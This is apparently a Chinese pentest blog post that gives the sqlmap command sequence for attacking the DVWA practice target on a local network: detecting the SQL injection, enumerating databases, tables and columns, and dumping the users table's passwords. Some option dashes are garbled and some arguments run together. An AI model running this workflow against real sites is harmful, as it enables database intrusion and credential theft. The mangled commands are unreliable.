BT5利用sqlmap对漏洞靶机扫描

1、通过sqlmap进行注入攻击:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'


2、通过sqlmap获取数据库名:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'--dbs -v 0


3、通过sqlmap获取表名;

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa �Ctables

163427510.png


4、通过sqlmap获取列名:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140' -D dvwa --tables -T users �Ccolumns

163458197.png



5、通过sqlmap导出password列的内容:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa --tables -T users --columns �Cdump

163522126.png


本文出自 “lopo” 博客,谢绝转载!

你可能感兴趣的:(sqlmap,bt5,对漏洞靶机扫描)